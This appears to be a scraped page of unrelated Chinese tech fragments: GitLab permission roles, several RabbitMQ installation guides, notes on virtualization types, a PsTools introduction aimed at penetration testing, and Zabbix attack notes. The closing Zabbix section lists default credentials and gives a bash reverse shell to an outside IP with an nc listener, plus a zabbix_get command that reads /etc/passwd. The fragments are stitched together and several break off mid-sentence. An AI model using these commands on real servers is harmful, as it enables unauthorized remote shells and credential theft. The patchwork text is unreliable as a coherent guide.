guest

Gitlab用户在组中有五种权限：Guest、Reporter、Developer、Master、Owner Gitlab权限管理 Gitlab用户在组中有五种权限：Guest、Reporter、Developer、Master、Owner Guest：可以创建issue、发表评论，不能读写版本库 Reporter：可以克隆代码，不能提交，QA、PM可以赋予这个权限 Developer：可以克隆代码、开发、提交、push，RD可以赋予这个权限 Master：可以创建项目、添加tag、保护分支、添加项目成员、编辑项目，核心RD负责人可以赋予这个权限 Owner：可以设置项目访问权限 - Visibility Level、删除项目、迁移项目、管理组成员，开发组leader可以赋予这个权限 Gitlab中的组和项目有三种访问权限：Private、Internal、Public Private：只有组成员才能看到 Internal：只要登录的用户就能看到 Public：所有人都能看到 开源项目和组设置的是Internal Gitlab权限管理 Gitlab用户在组中有五种权限：Guest、Reporter、Developer、Master、Owner Guest：可以创建issue、发表评论，不能读写版本库 Reporter：可以克隆代码，不能提交，QA、PM可以赋予这个权限

前言 目前公司用阿里云 + redis 的方式实现的消息队列。 了解了目前几种主流的消息组件（主要包括rabbitmq、kafka、）的优缺点后，这里为了深入学习rabbitmq，我在自己的腾讯云服务器上也搭建了一套环境。 准备工作 一台服务器：Ubuntu Server 16.04.1 LTS 64位 安装RabbitMq 可以参照RabbitMq官网的安装教程(Installing on Debian and Ubuntu)，来进行安装。 这里我们使用apt-get来安装，就简单的几条命令： 1.由于rabbitMq需要erlang语言的支持，在安装rabbitMq之前需要安装erlang，执行命令： apt-get install erlang-nox # 安装erlang erl # 查看relang语言版本，成功执行则说明relang安装成功 1 2 2.添加公钥 wget -O- https://www.rabbitmq.com/rabbitmq-release-signing-key.asc | sudo apt-key add - 1 3.更新软件包 apt-get update 1 4.安装 RabbitMQ apt-get install rabbitmq-server #安装成功自动启动 1 5.查看 RabbitMq状态 systemctl status

虚拟化类型 　　在虚拟化蓬勃发展的这些年里，虚拟化可以根据不同划分标准进行分类，包括全虚拟化，CPU 虚拟化，硬件虚拟化，服务器虚拟化，桌面虚拟化等等。我们通常所说的虚拟化主要是指平台虚拟化技术，通过使用 Hypervisor，隐藏特定计算平台的实际物理特性，为用户提供抽象的、统一的、模拟的计算环境（即虚拟机）。 　　这种分类并不是绝对的，一个优秀的虚拟化软件往往融合了多项技术。例如 VMware Workstation 是一个著名的全虚拟化的 VMM，但是它使用了一种被称为动态二进制翻译的技术把对特权状态的访问转换成对影子状态的操作，从而避免了低效的 Trap-And-Emulate （陷入-模拟）的处理方式，这与半虚拟化相似，只不过半虚拟化是静态地修改程序代码。对于半虚拟化而言，如果能利用硬件特性，那么虚拟机的管理将会大大简化，同时还能保持较高的性能。 　　下面分别介绍四类主流的分类方法： 从虚拟化的层次划分，主要分为软件辅助的虚拟化和硬件辅助的虚拟化。 软件辅助虚拟化：通过软件的方法，让客户机的特权指令陷入异常，从而触发宿主机进行虚拟化。主要使用的技术就是优先级压缩和二进制代码翻译。 硬件辅助虚拟化：是指在 CPU 中加入新的指令集和处理器运行模式，完成虚拟化操作系统对硬件资源的的直接调用。典型技术指的是 Intel VT，AMD-V。 从虚拟平台角度分为全虚拟化和半虚拟化

前言 项目中某些场景考虑到高并发情况，调研后决定使用RabbitMQ,本来以为很简单，没想到配置环境花费了好多时间，按照网上的方法来，总是有其他问题需要继续查找，特记录此笔记，方便下次部署安装。 本笔记只记录安装过程，不探讨RabbitMQ技术。 准备 使用RabbitMQ,除了要安装RabbitMQ外，还必须安装Erlang，由于RabbitMQ使用Erlang语言编写，所以必须先安装Erlang语言运行环境。 1.Erlang下载： http://www.erlang.org/downloads 2.RabbitMQ下载： http://www.rabbitmq.com/ 另外先提一下，Erlang和RabbitMQ安装好需要添加到系统的环境变量中，因为这个花费了我一些时间。 Erlang安装 1.安装 下载完Erlang之后，打开安装包后，一步步安装完成，这里没什么需要注意的地方。 2.设置环境变量 找到Erlang的安装路径打开到bin文件夹下，注意此路径。‘ 右键我的电脑，选择属性，找到高级系统设置，点开后选择高级里的环境变量。 找到系统变量中的Path，点击编辑 新建环境变量，添加路径，可以直接复制打开的Erlang的bin路径。 3.检查Erlang是否安装成功 打开cmd，输入 erl 后回车，如果能显示版本信息，表明安装成功。 RabbitMQ安装 1

首先RabbitMQ是使用erLang编写的开源消息中间件.所以需要先安装erlang环境. 我使用的是CentOS的系统安装erlang21.0的步骤如下: #下载安装包 (下面是我用的比较匹配的版本,可以直接使用,防止出现RabbitMQ嫌弃ErLang版本太低的问题,互相不兼容的问题,喜欢的请留个赞,谢谢!) 方法一: 链接: https://pan.baidu.com/s/1pQiMMF3K1sekoPKRN_S1xw 如果不喜欢可以使用以下方法直接去官网下载.如果遇到不匹配的情况,可以下载多个版本试验一下 方法二: wget http://erlang.org/download/otp_src_21.0.tar.gz # 解压文件 tar -zxvf otp_src_21.0.tar.gz cd otp_src_21.0 #编译 ./otp_build autoconf ./configure make (如果执行到此报错,请往下看,解决方案) #安装 make install ***如果在make的时候报错**** Makefile:248: /usr/local/otp_src_18.1/make/x86_64-unknown-linux-gnu/otp_ded.mk: No such file ,按照以下方式解决 sudo yum install ncurses

Linux下安装RabbitMQ 一下载依赖包 1.下载Rabbitmq 所依赖的环境gcc、erlang包和rabbitmq包，这里演示是网上下载 gcc 依赖 1 yum install build-essential openssl openssl-devel unixODBC unixODBC-devel make gcc gcc-c++ kernel-devel m4 ncurses-devel tk tc xz erlang依赖 1 wget www.rabbitmq.com/releases/erlang/erlang- 18.3 - 1 .el7.centos.x86_64.rpm rabbitmq包 1 wget www.rabbitmq.com/releases/rabbitmq-server/v3. 6.5 /rabbitmq-server- 3.6 . 5 - 1 .noarch.rpm 　　 二.使用rpm -ivh 命令安装erlang包和rabbitmq包 1 rpm -ivh erlang- 18.3 - 1 .el7.centos.x86_64.rpm 1 rpm -ivh rabbitmq-server- 3.6 . 5 - 1 .noarch.rpm 注意*安装rabbitmq这个包时候提示错误缺少一个socat依赖 我们用yum把它装上 1

环境：centos 7+ 1、查看用户是否存在 进入安装目录使用./sbin/rabbitmqctl list_users查看是否存在用户 比如：./usr/local/rabbitmq/rabbitmq_server-3.7.15/sbin/rabbitmqctl list_users 2、查看是否允许非localhost登陆（一般报错都是因为这个原因） ①进入安装目录使用./sbin/rabbitmq-plugins enable rabbitmq_management启动web管理页面 比如：./usr/local/rabbitmq/rabbitmq_server-3.7.15/sbin/rabbitmq-plugins enable rabbitmq_management ②浏览器输入IP:15672进行访问 如果登录遇到问题：User can only log in via localhost。 ①./usr/local/rabbitmq/rabbitmq_server-3.7.15/ebin/rabbit.app ② 将：{loopback_users, [<<”guest”>>]}， 改为：{loopback_users, []}， 原因：rabbitmq从3.3.0开始禁止使用guest/guest权限通过除localhost外的访问 3、还没想好。。。 文章来源:

RabbitMQ 是实现了高级消息队列协议（AMQP）的开源消息代理软件（亦称面向消息的中间件）。RabbitMQ服务器是用 Erlang 语言编写的，而集群和故障转移是构建在 开放电信平台 框架上的。所有主要的编程语言均有与代理接口通讯的客户端 库 安装RabbitMQ必须要有 Erlang的环境 ,没有装好环境的这里给出Erlang的官网可自行下载： https://www.erlang.org 一、配置RabbitMQ 　　1.将RabbitMQ的安装路径添加到环境变量中,启动RabbitMQ 　　2.启动WEB管理界面： rabbitmq-plugins enable rabbitmq_management 　　3.登录管理界面，RabbitMQ的管理界面的默认访问路径为： http://localhost:15672 　　4.可以使用 guest 用户登录，密码也是 guest 　　　　 二、C#实现的小案例，这里给出官方教程： https://www.rabbitmq.com/getstarted.html 　　1.发布者 　　　　　　var factory = new ConnectionFactory(); factory.HostName = "localhost"; factory.UserName = "guest"; factory.Password =

pstool的介绍 PsTools是Sysinternals Suite中一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools中含有12款各式各样的小工具。如果将它们灵活的运用，将会在渗透中收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。 还有所有的pstool都支持IP$，一旦IP$共享是连接的就不用输入-u 和-p这两个参数。 如何建立IP$连接。命令如下： Net user \\目标ip\ 密码 /user:用户 Net user \\192.168.1.3\ 123456 /user:test 建立后所有的ps工具都将可以不用输入用户和密码了。 其中12款工具简介如下： ◆PsExec - 远程执行进程 ◆PsFile - 显示远程打开的文件 ◆PsGetSid - 显示计算机或用户的 SID ◆PsInfo - 列出有关系统的信息 ◆PsKill - 按名称或进程 ID 终止进程 ◆PsList - 列出有关进程的详细信息 ◆PsLoggedOn - 查看在本地通过资源共享（包含所有资源）登录的用户 ◆PsLogList - 转储事件日志记录 ◆PsPasswd － 更改帐户密码 ◆PsService - 查看和控制服务 ◆PsShutdown - 关闭并重新启动（可选）计算机 ◆PsSuspend -

1：Zabbix配置不当安全事件 ①案例事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627 京东某站shell直入jae内网物理机内核版本过低 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349 2：Zabbix弱口令利用 ①弱口令 运维人员在初次安装zabbix时候，zabbix默认的口令为Admin:zabbix，以及存在guest密码为空，没有进行更改和禁止guest用户，导致zabbix存在致命漏洞，容易遭受攻击。 ②Zabbix server可以远程在agent的机器上执行任意命令 建立监控项 命令调用：bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1 命令调用：nc -lvp 6666 zabbix_get命令调用 system.run[command,<mode>]这个模块是agent自带的，获取服务器shell，获取root权限。 命令调用：zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]' 3：Zabbix 注入利用 ① 通过guest用户session的后16位替换连接的sid